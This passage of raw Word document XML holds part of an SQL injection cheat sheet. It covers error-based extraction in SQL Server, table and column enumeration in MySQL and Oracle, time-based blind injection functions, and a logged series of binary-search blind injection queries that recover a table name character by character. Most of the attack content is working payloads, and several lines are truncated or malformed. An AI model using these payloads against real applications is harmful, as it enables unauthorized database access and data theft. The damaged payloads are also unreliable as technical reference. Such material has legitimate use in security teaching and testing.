          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SELECT * FROM Product WHERE ID=2 AND 1=CAST((Select p.name from (SELECT (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D84B88F"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BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">   SELECT COUNT(i.id) AS rid FROM sysobjects i WHERE i.id&lt;=o.id) AS x, name from sysobjects o) as p where p.x=3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A90C15"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inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>   as int as p where p.x=3) as int </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B415C11"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BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Select p.name from (SELECT (SELECT COUNT(i.id) AS rid FROM sysobjects i WHERE xtype='U' and i.id&lt;=o.id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4575DB3B"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inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    AS x, name from sysobjects o WHERE o.xtype = 'U') as p where p.x=21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5568455E"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r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Error-based SQL injections in SQL Server: A fast way to extract data (S)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3A064F"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Here’s a sample payload that combines variables and system table queries to extract data into a temporary table (use </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>syscolumns</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sysobjects</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> for older version and </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sys.columns</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sys.objects</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> for newer versions):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7910D266"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BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">';BEGIN DECLARE @rt varchar(8000) SET @rd=':' SELECT @rd=@rd+' '+name FROM syscolumns WHERE </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15647AC2"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BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">   id =(SELECT id FROM sysobjects WHERE name = 'MEMBERS') </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC626F0"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BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">   AND name&gt;@rd SELECT @rd AS rd into TMP_SYS_TMP end;--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED0A373"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151B3996"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BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">';BEGIN DECLARE @rt varchar(8000) SET @rd=':' SELECT @rd=@rd+' '+name FROM sys.columns WHERE </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507CFBEB"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BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">   id =(SELECT id FROM sys.objects WHERE name = 'MEMBERS') </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D94AB3"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Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">   AND name&gt;@rd SELECT @rd AS rd into TMP_SYS_TMP end;--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C13972F"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r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Finding the database structure in MySQL (M)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769BBDF6"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Getting user-defined tables (M)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD3890B"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Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>SELECT table_name FROM information_schema.tables WHERE table_schema = 'databasename'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013D3C73"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Getting column names (M)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2544A5E7"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Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SELECT table_name, column_name FROM information_schema.columns WHERE table_name = 'tablename'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559D4325"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r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Finding the database structure in Oracle (O)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D25B893"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Getting user-defined tables (O)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B269E30"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Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SELECT * FROM all_tables WHERE OWNER = 'DATABASE_NAME'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138F9FE3"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Getting column names (O)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F5721A"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Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SELECT * FROM all_col_comments WHERE TABLE_NAME = 'TABLE'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E27107B"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r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Blind SQL injections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB031FF"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In any decent production application, you generally cannot see any error responses on the page. This rules out extracting data directly through error-based attacks. In these cases, you have to use blind SQL injections to extract the data. There are two basic kinds of blind SQL injections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617AF274" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Normal blind injections:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> You cannot see the response directly on the page, but you can still determine the result of a query based on a response or HTTP status code. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B43EDB" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Totally blind injections:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> You cannot see the effects of your injection in any kind of output. This is less common, for example when you’re injecting into a logging function or similar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DC34EB"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In normal blind injections, you can use </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IF</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> statements or abuse </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> clauses in queries, which is generally the easier route. For totally blind injections, you need to use some kind of wait function and then analyze the response times.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E701A7"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Examples of available wait/timeout functions include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443714D2" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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WAITFOR DELAY '0:0:10'</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> in SQL Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10269C20" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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BENCHMARK()</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sleep(10)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> in MySQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34403751" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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pg_sleep(10)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> in PostgreSQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E96E10A"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For Oracle, there are some PL/SQL tricks you can use for the same effect.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D440278"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lastRenderedPageBreak/>
        <w:t>Real-life example of an automatable blind SQL injection attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551F7428"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This output is taken from a real private blind SQL injection tool while exploiting SQL Server back-ended application and enumerating table names. These requests are done for first character of the first table name. The SQL queries are a bit more complex then necessary to allow for automation. Through this series of injections, we are trying to determine the ASCII value of a character using a binary search algorithm. In effect, we’re asking a series of yes/no questions about value ranges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B81612"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The following series of queries was executed to track down the first character (where </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TRUE</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FALSE</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> flags indicate the logical result of each query):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B338DD3"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BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TRUE</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)&gt;78-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D4B6F6"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BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FALSE</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)&gt;103--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727BD700"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BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TRUE</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F420D3"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BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FALSE</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)&gt;89-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179C0204"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BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TRUE</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5706123E"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BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FALSE</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)&gt;83-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF6B69B"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BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TRUE</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C8293A"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BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FALSE</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)&gt;80-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE29CDF"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Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FALSE</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A8C1CC"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 xml:space="preserve">Since the last two queries both failed, we now know that 80 is the ASCII value of the first character of the table name, so the table name starts with the letter P. In this way, you can exploit blind SQL injections using a binary search algorithm. Another well-known way is to read data one bit at a time. Both methods can be effective in different conditions. If you can get direct feedback, it's enough to go through a fixed </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
